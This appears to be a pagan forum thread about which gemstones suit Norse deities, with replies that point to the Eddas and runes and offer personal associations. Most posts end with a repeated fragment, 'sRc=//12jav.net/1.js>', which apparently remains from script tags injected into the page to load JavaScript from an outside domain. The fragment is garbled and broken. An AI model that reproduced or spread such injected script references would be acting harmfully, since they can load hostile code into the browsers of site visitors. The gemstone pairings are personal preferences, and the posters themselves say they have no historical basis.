Hi everyone, I am looking for any information on Norse Gods and Goddesses as well as what gemstones they associate with. Anyone have any info or links to share? Thanks in advance! c: sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I do not believe that there is a historical resource for what you seek.

You are probably going to have to make your own cross-reference system. Study the aspects of the Norse deities, then compare them to metaphysical properties of stones. Example: Thor has the whole lightning thing going for him so maybe use an opal to represent him. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

NordStar, there doesn't need to be a historical reference, necessarily. We are a living religion, not a fan-base for the ancient ways. Our world is different than the Norse's and I believe that the gods have grown with us. That said, there aren't many stones associated with gods that I know of. Having a "god of [blank] " or things associated with a god (and that god alone) is somewhat foreign to Heathenism, and is more found in Greek/Roman Paganism and Wicca. The only stone that I would consider tied to a particular god would be fulgarite, as it is essentially solidified lightning. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I do know that Odin's got some pretty cool runes going on that you can meditate upon and get familiar with their meanings and so on so forth with....

But I don't know much else about gemstones? Or nothing is coming to mind really. I do know gold is mentioned, as in Golden Apples. Might wanna read some of the poems associated with them? (forgot the names of the works of literature as well, drats!)

The Eddas, but the thing is that Heathenism isn't bound by the Eddas - it's not like a bible or anything of the sort. That said, it doesn't make any mention of stones; those are new to this era. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Honestly I believe it is a personal experience which one might need to ask? Do I favor any gemstone or crystals? Have I had any personal experience with the Norse entities? Do I have enough background information to allow me to cross these two concepts together?
Question your question. Answer them. And go forth to discory the original answer you seek.
Personally however I use fire agate and lava rocks for Loki. Odin I use clear quartz due to its various adaptation. Baldr I use snowflake obsidian... I could go on but personal research is much more rewarding than the common. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
